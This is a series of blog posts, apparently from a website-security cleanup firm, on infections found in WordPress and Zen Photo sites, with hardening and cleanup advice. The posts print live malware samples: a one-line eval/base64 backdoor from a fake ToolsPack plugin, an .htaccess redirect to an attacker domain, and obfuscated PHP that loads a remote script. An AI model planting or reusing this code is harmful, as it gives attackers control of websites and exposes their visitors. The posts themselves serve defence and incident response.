We’ve seen this for awhile now, but recently it seems to be a growing trend.

Many of the websites we’ve been cleaning have the backdoor scripts injected into the SQL database so that when the webpage is accessed, the backdoor is available, but invisible to the visitor.

To a hacker who knows what page or which website is carrying their code, it’s easy for them to send a string of code and on their screen the backdoor shell script appears.

When we have the access logs available to us, we have analyzed them and it does not appear to be a regular SQL injection (SQLi), but it does appear that the hackers find a point of entry to the website, then search for the file that contains the database information. They upload a shell that provides them with something like phpmyadmin, then they add their infectious code to selective fields in the database.

We know that many people believe that moving their wp-config.php file outside of the public_html folder keeps their database login information safe. This is not true. When a hacker infects a website, they typically have full access to the hosting account. This includes the areas outside of public_html. We’ve seen this thousands of times.

At times the code has been an infectious iframe or other javascript string, however, finding full backdoor shells buried in the SQL database is even more alarming. The hackers have created various ways of hiding this so when a legitimate user visits the website they don’t see any suspicious code. When a hacker sends their code to the specific webpage, it opens their backdoor shell. This will hide their code from many of the online scanners. We still feel these online scanners are helpful, but the hackers are finding various methods to hide their activities.

This makes repeat infections extremely easy for the hackers. As a website owner you could be searching all the code on your site and find nothing. To find this malicious code, you’ll have to export your database and then scan it for any script tags and for any php tags. If you find any, you’ll have to analyze the string to determine if it’s malicious or not.

One key we’ve found is that their backdoor shells need a field in the database that’s large enough to contain their lengthy code – at least for the backdoor shell scripts. Smaller javascript or iframe infections could be anywhere in the database. You’ll have to be familiar enough with the database layout for your website to know where to look.

If you’ve been subjected to repeat infections, you might want to look in your database. Even if you haven’t been subjected to repeat website infection, you might still want to look in your database to see what might be lurking.

If you need help analyzing your database, please send an email to: traef@wewatchyourwebsite.com.

If you have any more insight to this infection, or have additional questions, please leave a comment.

Thank you.

It didn’t take long for hackers to take advantage of the social networking site: pinterest.com.

If you’re not familiar with Pinterest, it’s a site where you can create a “board” and you then “pin” video or graphic image files of anything that interests you.

Friends, family, acquaintances, can re-pin your pinned interests and so on…

Recently, cybercriminals have been posting images of Starbuck’s gift cards and free Coach wallets and purses (handbags as my wife prefers).

The potential victim will have to visit a particular site to claim their “prize”.

The scam begins when you visit that site, you’re redirected to a website that first requires you to re-pin the image, so they can spread their “generosity” further, then clicking on a link to a survey site – which is a scam.

Cybercriminals are very adept at scams like these. They know that by asking you to re-pin their pin, they believe that people you know will help spread their scam.

Some of the redirects are to CPA (cost-per-action) sites where the cybercriminals are paid to drive traffic to these sites. Other sites the unsuspecting victim is redirected to asks them to install toolbars, backgrounds and other seemingly “harmless” utilities. Cybercriminals also get paid for these installations as pay-per-installs.

Some redirects we followed actually asked for personal information. We believe this could eventually be used to steal identities which are then sold to other cybercriminals.

People always ask us why hackers hack. This is one method they have of making money. While this method may not directly infect or attempt to infect your computer, it feeds the cybercriminals with more income.

If you’ve followed any of these, please share your experience below. If you know someone who is using Pinterest.com, please let them know about this scam.

Thank you.

We’ve been seeing a lot of this lately, infected websites that have the wording,

you need to pay for this crypt

over and over a few times across the top of the webpages.

This is usually accompanied by some script tags that try to infect the visitor with the Blackhole Kit. (The Blackhole Kit is an exploit used by hackers to try and infect the visitor’s browser with a variety of viruses, trojans and other malware)

On WordPress websites we’ve seen this in the index.php files all over the website. It’s an indication that your website has been infected and needs to be cleaned and hardened.

You can begin by removing the malscript immediately preceeding this text. You can look in the wp-content/index.php which is normally about 30 bytes. With anything malicious in there it will be much larger in file size.

Then, make certain that your WordPress is updated and all plugins too.

We’ve also been seeing many WordPress sites infected due to hackers logging into their wp-admin.

Why?

Because there are still many people who believe that having admin as a user and admin as a password is acceptable. Too many people believe that, “Hackers only want the bigger, more heavily visited websites. They won’t bother with mine.”

People. Hackers want all websites. The amount of “low-hanging fruit” needs to be drastically reduced – or better yet, eliminated.

Change your passwords immediately. Make them strong. Make them at least 10 characters and use upper case, lower case, numbers and some punctuation. Take some phrase and convert to a combination of the above.

Take for instance the movie Oceans 11. That can be converted into:

0c3@n$_elEv3N_+h3_MoV1E

Yes, it’s more difficult to remember. But what’s worse? Remembering your password, or having your website constantly infected?

If you need help cleaning up from an infection, please email me at traef@wewatchyourwebsite.com.

Thank you.

With many themes using the timthumb.php and thumb.php files, we thought we should update our readers with the latest on timthumb.php.

First, make certain you have the latest: http://timthumb.googlecode.com/svn/trunk/timthumb.php

As of this post, the current version is 2.8.9.

Open that file and inside you’ll this line to verify you have the correct version:

define (‘VERSION’, ’2.8.9′);

Scroll down a few lines and you’ll:

if(! defined(‘ALLOW_EXTERNAL’) ) define (‘ALLOW_EXTERNAL’, TRUE); // Allow image fetching from external websites. Will check against ALLOWED_SITES if ALLOW_ALL_EXTERNAL_SITES is false

This means that if the ALLOW_EXTERNAL parameter is set to TRUE, like it is here, and the parameter ALL_ALL_EXTERNAL_SITES is false, then timthumb.php will check the included link to see if it’s in the list of ALLOW_SITES.

If you at the next line down in this file you’ll see:

if(! defined(‘ALLOW_ALL_EXTERNAL_SITES’) ) define (‘ALLOW_ALL_EXTERNAL_SITES’, false); // Less secure

With these 2 parameters set the way they are, timthumb.php will only show files from the list of ALLOWED_SITES. Next we need to examine the sites listed in ALLOWED_SITES.

Scroll down a few more lines and you’ll see:

// If ALLOW_EXTERNAL is true and ALLOW_ALL_EXTERNAL_SITES is false, then external images will only be fetched from these domains and their subdomains. if(! isset($ALLOWED_SITES)){ $ALLOWED_SITES = array ( 'flickr.com', 'staticflickr.com', 'picasa.com', 'img.youtube.com', 'upload.wikimedia.org', 'photobucket.com', 'imgur.com', 'imageshack.us', 'tinypic.com', 'yourdomainhere', ); }

Now in the line where we have: ‘yourdomainhere’ you would replace that with your website domain. For us, it would be ‘wewatchyourwebsite.com’. A few things to note here. If you don’t ever expect to load images from the other sites, then delete them as well while you’re in here.

What we’ve done is to allow timthumb.php to show files that are stored on your website and the locations above that. Any other domain will not be accepted and will not show. If you don’t do this, then hackers could include files from their websites and infect your website with their malicious code.

This version of timthumb.php does use a non-web folder for cache, so it is more secure, but configuring it this way adds another layer of protection to your site, and we do believe in defense in layers.

If you have questions about this information or you’re having trouble configuring it properly for your site, please post a comment and we’ll help you.

Thank you for reading.

Over the past 2 weeks we’ve seen many infected WordPress websites. A large portion of these infected WordPress websites had the ToolsPack plugin installed.

This plugin only has one file: /wp-content/plugins/ToolsPack/ToolsPack.php

Inside that file looks like this:

/* Plugin Name: ToolsPack Description: Supercharge your WordPress site with powerful features previously only available to WordPress.com users. core release. Keep the plugin updated! Version: 1.2 Author: Mark Stain Author URI: http://checkWPTools.com/ */ $_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) ) : exit;

Part of our process in the cleaning of an infected website is determining how the website was infected so we can create a security plan to prevent the website from being infected again.

Many of these infected WordPress websites were “hacked” by stolen login credentials – yes, the WordPress username and password.

How did we find this?

Our process includes log file analysis. We started seeing traffic to the ToolsPack.php file around the same time the files were infected. Closer examination of that file revealed the code listed above.

Some Google searches showed that while the plugin appeared to be marketed as legitimate, it was not.

Further analysis of the datetime stamp on ToolsPack folder and the log files did not show any correlation. In talking with the website owners we had them run virus scans on their computers and everyone of them with the ToolsPack plugin had a virus or trojan on them. This included Apple’s Mac.

Yes, the hackers are infected computers, both PCs and Macs with password stealing trojans. These password stealing trojans are stealing all passwords.

We have worked on many hosting accounts that had FTP accounts added to them. The hackers stole the hosting account username and password, logged in and created their own FTP accounts – with strong passwords of course.

Website security is a blended partnership between WeWatchYourWebsite and you. We can watch and update and protect your website, but if the hackers are logging in as you, we cannot prevent that.

Strong passwords, renaming the admin account and all the security related plugins would not prevent this type of attack. You may be alerted to the new plugin being installed, but by then, your account has already been compromised.

We suggest you run a full virus scan on your computer, yes even on your Mac, at least once a week. Be certain that the signatures are updated every day as well.

If you assistance in recovering from this infection, please contact me directly at: traef@wewatchyourwebsite.com or by phone at: (847)728-0214.

Thank you.

Over the past few weeks we’ve cleaned a number of websites that were infected with l_backuptoster.php and while it’s been around awhile, we thought we would share our experience. This infection isn’t so much about website security as it is about computer security, but it does eventually affect your website security as well – which is why we’re involved.

For those of you unfamiliar with this little gem, it’s used by hackers to send SPAM. It is uploaded to the website via FTP – which means that the FTP password has been compromised, or worse, the hosting account password has been compromised.

In the most recent instances of websites infected with the l_backuptoster.php file, a new FTP account was created on the hosting account and that was used to upload the files. The files is uploaded with 2 other files: body1.txt and body.txt, used, then deleted until the next time the hacker wants to send SPAM.

Here is what you might see in your FTP logs:

Tue Dec 20 06:32:41 2011 0 xx.xx.xx.xxx 320 /home/path/public_html/body1.txt b _ i r candy@yourdomain ftp 1 * c Tue Dec 20 06:32:42 2011 0 xx.xx.xx.xxx 292 /home/path/public_html/body.txt b _ i r candy@yourdomain ftp 1 * c Tue Dec 20 06:32:42 2011 0 xx.xx.xx.xxx 8160 /home/path/public_html/l_backuptoster.php b _ i r candy@yourdomain ftp 1 * c

The xx.xx.xx.xxx would actually be where this traffic is originating. The number after is the file size, the path and the FTP account used.

You see that first the body1.txt file, with a size of 320, was uploaded to the folder shown, followed by body.txt with a size of 292 and finally the l_backuptoster.php file with a size of 8160.

If you’ve been infected with this, and you have your Raw Access Logs activated, you will probably also see entries like these in your access logs:

xx.xx.xx.xxx – - [12/Jan/2012:12:34:58 -0700] “GET /l_backuptoster.php?id=4550&ipAddr=xx.xx.xx.xxx&serv_name=www.yourdomain HTTP/1.1″ 200 205 “-” “-” xx.xx.xx.xxx – - [12/Jan/2012:12:34:58 -0700] “GET /l_backuptoster.php?id=4554&ipAddr=xx.xx.xx.xxx&serv_name=www.yourdomain HTTP/1.1″ 200 205 “-” “-”

Again, the xx.xx.xx.xxx would actually show the originating IP address. In our work, we track down this IP address and report it to the proper people as this is an indication that the originating IP address is being used in a suspicious manner.

In the above log file entries the ipAddr matches the first IP address and the serv_name parameter would be your, or the infected URL.

You will probably see hundreds of these lines if your website is being used with the l_backuptoster.php file.

What we found in each case of a website infected with l_backuptoster.php was that the FTP account used to upload these files was not created by the hosting account owner. The only way this could have been achieved was if the hosting account password had been compromised.

If this is true, then the hackers are no longer just stealing the FTP login credentials, but their keyboard loggers are also recording all logins and the hackers are very interested in infecting websites so why not create their own FTP account.

As stated earlier, after the activity in the access logs, we found that the 3 files uploaded were deleted so there was no trace. The hackers would simply upload the files again at a later time, use them and delete them.

Without constant watching of the log files, we would not have seen this.

If you have been a victim of the l_backuptoster.php website infection, here’s what you should do:

• Change your hosting account password
• Check your hosting account for unused or unauthorized FTP accounts and delete any that you aren’t familiar with
• Create new passwords for remaining FTP accounts
• Perform a full system virus scan with either Avast! or AVG anti-virus and use Malwarebytes as a secondary scanner. If you’re using a Mac try BitDefender
• Check your log files on regular basis. Download them to your computer and search for ‘l_backuptoster.php’

One point to remember, do not ever have your browser save your hosting account password or the any passwords. We have copies of the viruses hackers use to steal passwords and they work extremely well on browser saved passwords!

If you’ve been infected by this and have more to add, please leave a comment. If you need help in cleaning this up and getting everything “locked down”, please email me at traef@wewatchyourwebsite.com or call at (847)728-0214.

Thank you.

If you found this useful, Tweet about us, like us on Facebook or follow us on Google+.

This infection has been around for awhile, but it’s been more popular recently.

We’ve been seeing it after the closing html tag in index.html files:

Here’s the code:

(opening script tag) var BrowserDetect = { init: function () { this.browser = this.searchString(this.dataBrowser) || "An unknown browser"; this.version = this.searchVersion(navigator.userAgent)...');}else {}(closing script tag)

There have been other domains in place of allegianstaffing.com too, but the bottom line is that the above script performs a series of browser checks then creates an iframe.

This infection has been seen in Zen Cart, osCommerce, WordPress and Prestashop websites by us, but I’m certain that it’s just the infection used at the moment.

If you’ve experienced this infection and need assistance with it, please call us at (847)728-0214 or email me at traef@wewatchyourwebsite.com

If you have any comments to add to this, please leave a comment below.

Thank you.

We’re seeing some websites infected with code that starts with:

gogele analytics start

It then continues with:

(opening script tag)try{document.asd.removeChild({})}catch(q){ss=”";s=String;}ddd=new Date();…eval(ss);(closing script tag)

and ends with:

gogele analytics end

We’ve been seeing this in index.html files usually immediately following the opening body tag ().

So far, no other common factors in the sites we’ve cleaned this from.

If you have any further information you’d like to share, please post a comment. If we find more information we’ll be sharing it here.

If you know of someone who could benefit from this information, please share it, Tweet it, post it on your Facebook or LinkedIn pages.

If you need help cleaning this, you can call us at (847)728-0214 or email directly at: traef@wewatchyourwebsite.com

Thank you.

While cleaning more websites with Zen Photo installed, we’re finding some new infections.

We’ve been seeing files added called thumbsdata.php. They usually have a string of code like this:

$vf=substr(1,1);foreach(array(10,100,111,99,117,109…{ $l = $_GET["l"]; } @header(“Location: $l”); exit; }

This is accompanied by an .htaccess file in the same folder with lines similar to this:

ErrorDocument 400 http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI} ErrorDocument 401 http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI} ErrorDocument 403 http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI} ErrorDocument 404 http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI} ErrorDocument 500 http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI} RewriteEngine On RewriteRule !thumbsdata.php http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI} [R=301,L]

We’ve seen other domains used as well, but this is just an example.

In the log files we’re seeing strings sent to the c.php file in the root of the Zen Photo installation. This file works with captcha, but apparently doesn’t sanitize the data.

Again, this is in older versions of Zen Photo.

Please update your Zen Photo websites immediately.

Post a comment here if you have more information.

If you need assistance in cleaning this up, please call me at (847)728-0214, Skype: wewatchyourwebsite or email me at: traef@wewatchyourwebsite.com

Thank you.

Over the past week we’ve been seeing many photographer’s websites infected through an exploit in Zen Photo. Actually it’s not Zen Photo, but the ajaxfilemanager.php file used in the tiny_mce plugin.

Check your websites for the file: ajaxfilemanger.php and rename it or delete it.

In Zen Photo based websites the above file can be found in:

zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager

The file is accessible from a browser which allows anyone to upload files to your website. Quite often we see files on websites with a .jpg or .png extension, which are normally graphic files, but the files we’re concerned with are actually PHP files. The hackers have many ways of renaming these to .php extensions and then they run them and infect the website.

If your website is hosted on a Linux server, you can use a .htaccess file to protect this file with something like:

RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /ajaxfilemanager/.*$ [NC] RewriteCond %{REQUEST_FILENAME} ^.+\.php$ RewriteRule .* – [F,NS,L]

Which will prevent remote access to all .php files in the ajaxfilemanager folder.

Depending on what version of Zen Photo, we have seen some config.php files with a line:

define(‘CONFIG_QUERY_STRING_ENABLE’, true);

Which appears to allow you send a string that would tell ajaxfilemanager what configuration file to use. This should be set to false.

You can either rename the ajaxfilemanager folder, delete it, use an .htaccess file or make certain your plugins are updated but you have to do something to protect your website.

The most common file we’ve seen in websites infected through this method is:

/zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/class.images.php

And it usually has this code:

(opening php tag followed by a long string of blank spaces)$vf=substr(1,1);foreach(array(10,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,105,110,110,101,114,72,84,77,76,61,39,39,59,10,10,13,9,92,39,0,112,49,60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,102,97,99,101,116,111,102,97,99,101,46,100,101,47,101,120,116,47,62,60,47,115,99,114,105,112,116,62,116,114,117,101,99,115,115) as $vj[0])…unset($vf);unset($vj);(closing php tag)

It is our understanding that the file name is very similar to legitimate files in the same folder.

We’ve been seeing many other backdoors uploaded with this same exploit so you really should have it examined carefully.

Please leave a comment if you found this interesting, if you have more questions about this or have additional information regarding this infection.

As always, if you need help cleaning this up, call us at (847)728-0214 or email me at traef@wewatchyourwebsite.com

Thank you.